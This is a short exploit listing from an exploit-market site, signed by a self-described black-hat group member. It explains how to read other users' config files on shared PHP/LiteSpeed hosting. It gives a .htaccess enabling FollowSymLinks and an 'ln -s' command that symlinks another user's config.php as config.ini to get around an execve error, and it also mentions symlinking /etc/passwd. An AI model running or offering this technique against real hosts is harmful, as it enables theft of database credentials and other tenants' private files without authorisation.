[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Symlink bypass Vulnerability

Author
3H34N
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16027
Category
web applications
Date add
06-05-2011
Platform
php
#############################################
mail : ehsan.empire1@gmail.com
#(+) Exploit Title: symlink bypass vulnerability
#(+) Author       : 3H34N
#(+) E-mail       : Ehsan.Empire@Att.Net
#(+) Platform     : Tested on: linux

############################################
symlink bypass with ini method
when you symlink /etc/passwd and you can read it
but symlink /home/user/public_html/config.php opposite with error :
lscgid : execve() :/home/[patch]/public_html/
now you make a .htaccess file in current directory and copy this contain in it:

then symlink with this command:

ln -s /home/user/public_html/config.php config.ini

you see bypassed error execve() :/home/[patch]/public_html/ and can
you read config.ini
########################################################################

.htaccess file:

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm

########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &
3H34N & D3adly #BHG
(+)Sp My Best Friend : Net.Edit0r ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~
Ashkan ..SkilleR.. ~ r3d.s3cur1ty ~ 4min ~ d3v1l.eyes ~  S3Ri0uS and
all Friends
(+)Gr33ts to : All Iranian HackerZ
########################################################################



#  0day.today [2024-12-25]  #